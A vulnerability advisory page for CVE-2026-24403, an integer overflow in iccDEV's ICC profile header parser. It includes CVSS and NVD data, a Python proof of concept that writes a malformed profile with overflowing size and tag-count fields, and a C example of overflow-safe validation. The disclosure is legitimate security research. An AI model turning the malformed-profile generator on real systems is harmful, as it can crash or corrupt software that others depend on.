Security Vulnerability Report
CVE-2026-24403 CVSS 7.1 HIGH

Published: 2026-01-24 01:15:51
Last Modified: 2026-01-30 18:23:11

Description

iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. In versions 2.3.1.1 and below, an integer overflow vulnerability exists in icValidateStatus CIccProfile::CheckHeader() when user-controllable input is incorporated into profile data unsafely. Tampering with tag tables, offsets, or size fields can trigger parsing errors, memory corruption, or denial of service (DoS), potentially enabling arbitrary code execution or bypassing application logic. This issue has been fixed in version 2.3.1.2.

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H

Configurations (Affected Products)

cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:* - VULNERABLE
iccDEV <= 2.3.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
PoC for CVE-2026-24403: iccDEV Integer Overflow in CIccProfile::CheckHeader()

This PoC demonstrates the integer overflow vulnerability by crafting a
malicious ICC profile with manipulated tag table size fields.
"""
import struct


def create_malicious_icc_profile():
    """
    Create a malicious ICC profile that triggers integer overflow in
    CIccProfile::CheckHeader() function.
    """
    # ICC Profile Header (128 bytes)
    header = bytearray(128)

    # Profile size field - set to a value that will cause overflow
    # when combined with tag count in size calculations
    profile_size = 0xFFFFFFFF  # Max uint32 - will overflow when calculating actual size
    struct.pack_into('>I', header, 0, profile_size)

    # Preferred CMM type
    header[4:8] = b'lcms'
    # Profile version field (the PoC sets 0x02310100)
    header[8:12] = struct.pack('>I', 0x02310100)
    # Device class
    header[12:16] = b'mntr'
    # Color space
    header[16:20] = b'RGB '
    # PCS
    header[20:24] = b'Lab '
    # Date: a dateTimeNumber is six uint16 values (12 bytes), so pack with 'H'
    header[24:36] = struct.pack('>HHHHHH', 2026, 1, 1, 0, 0, 0)
    # Profile file signature
    header[36:40] = b'acsp'
    # Primary platform
    header[40:44] = b'MSFT'
    # Various flags
    struct.pack_into('>I', header, 44, 0)
    # Device manufacturer
    header[48:52] = b'TEST'
    # Device model
    header[52:56] = b'MODL'
    # Device attributes
    header[56:64] = b'\x00' * 8
    # Rendering intent
    struct.pack_into('>I', header, 64, 0)
    # PCS illuminant (D50)
    struct.pack_into('>III', header, 68, 0x0000F6D6, 0x00010000, 0x0000F6D6)
    # Profile creator
    header[80:84] = b'TEST'
    # Profile ID (MD5)
    header[84:100] = b'\x00' * 16

    # Tag count - set high to trigger overflow in size calculations.
    # It is the first field of the tag table, directly after the 128-byte header.
    tag_count = 0xFFFFFFF0  # Large value that will cause integer overflow
    tag_table = struct.pack('>I', tag_count)

    # Write malicious profile
    with open('CVE-2026-24403_malicious.icc', 'wb') as f:
        f.write(header + tag_table)

    print("[+] Created malicious ICC profile: CVE-2026-24403_malicious.icc")
    print(f"[+] Profile size field: 0x{profile_size:08X}")
    print(f"[+] Tag count: {tag_count}")
    print("[+] This profile will trigger integer overflow in CIccProfile::CheckHeader()")


if __name__ == '__main__':
    create_malicious_icc_profile()
```
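A defender-side counterpart to the PoC above, as an added example that is not iccDEV's code and does not reproduce the 2.3.1.2 fix: overflow-safe checks on the profile size field, tag count, and tag offsets/sizes before any parsing. The function names `icc_check_layout` and `check_sample`, the return codes, and the 160-byte sample buffers are assumptions made for illustration.

```c
/* Added example: overflow-safe ICC layout checks. All names are hypothetical. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#define HDR 128u   /* ICC header size in bytes */
#define ENTRY 12u  /* tag entry: signature, offset, size (3 x uint32) */

static uint32_t be32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}
static void put32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)(v >> 24); p[1] = (uint8_t)(v >> 16); p[2] = (uint8_t)(v >> 8); p[3] = (uint8_t)v;
}
/* Returns 0 when the layout is consistent, else a negative code naming the failed check. */
int icc_check_layout(const uint8_t *buf, size_t len) {
    if (buf == NULL || len < HDR + 4u) return -1;          /* need header + tag count */
    uint32_t declared = be32(buf);                          /* profile size field */
    if (declared < HDR + 4u || declared > len) return -2;  /* must fit the real buffer */
    uint32_t count = be32(buf + HDR);
    /* Divide rather than multiply: count * 12 wraps in 32 bits for large counts. */
    if (count > (declared - HDR - 4u) / ENTRY) return -3;
    uint32_t data_start = HDR + 4u + count * ENTRY;         /* cannot wrap after the check */
    for (uint32_t i = 0; i < count; i++) {
        const uint8_t *e = buf + HDR + 4u + (size_t)i * ENTRY;
        uint32_t off = be32(e + 4), size = be32(e + 8);
        if (off < data_start || off > declared) return -4;  /* offset outside tag data */
        if (size > declared - off) return -5;               /* avoids wrapping off + size */
    }
    return 0;
}

/* Constructed sample: 160-byte profile skeleton carrying one tag entry. */
int check_sample(uint32_t declared, uint32_t count, uint32_t off, uint32_t size) {
    uint8_t buf[160];
    memset(buf, 0, sizeof buf);
    put32(buf, declared);
    put32(buf + HDR, count);
    memcpy(buf + HDR + 4, "desc", 4);
    put32(buf + HDR + 8, off);
    put32(buf + HDR + 12, size);
    return icc_check_layout(buf, sizeof buf);
}

int main(void) {
    printf("%d %d %d %d\n", check_sample(160, 1, 144, 16), check_sample(0xFFFFFFFFu, 1, 144, 16),
           check_sample(160, 0xFFFFFFF0u, 144, 16), check_sample(160, 1, 144, 0xFFFFFFF0u));
    return 0;
}
```

The last case is the one a naive `off + size <= declared` test misses: 144 + 0xFFFFFFF0 wraps to 128 in 32-bit arithmetic and would pass.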

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24403", "sourceIdentifier": "[email protected]", "published": "2026-01-24T01:15:50.620", "lastModified": "2026-01-30T18:23:11.460", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. In versions 2.3.1.1 and below, an integer overflow vulnerability exists in icValidateStatus CIccProfile::CheckHeader() when user-controllable input is incorporated into profile data unsafely. Tampering with tag tables, offsets, or size fields can trigger parsing errors, memory corruption, or DoS, potentially enabling arbitrary Code Execution or bypassing application logic. This issue has been fixed in version 2.3.1.2."}, {"lang": "es", "value": "iccDEV proporciona librerías y herramientas para interactuar con, manipular y aplicar perfiles de gestión de color ICC. En las versiones 2.3.1.1 e inferiores, existe una vulnerabilidad de desbordamiento de entero en icValidateStatus CIccProfile::CheckHeader() cuando la entrada controlable por el usuario se incorpora de forma insegura en los datos del perfil. La manipulación de tablas de etiquetas, desplazamientos o campos de tamaño puede desencadenar errores de análisis, corrupción de memoria o DoS, lo que podría permitir la ejecución de código arbitrario o eludir la lógica de la aplicación. Este problema se ha solucionado en la versión 2.3.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.2", "matchCriteriaId": "D34CF745-E75A-4F1C-AD7B-9AC1A2E9F680"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/commits/d993997005449a0a6958e65b057bd25e17dff89", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/505", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-ph33-qp8j-5q34", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}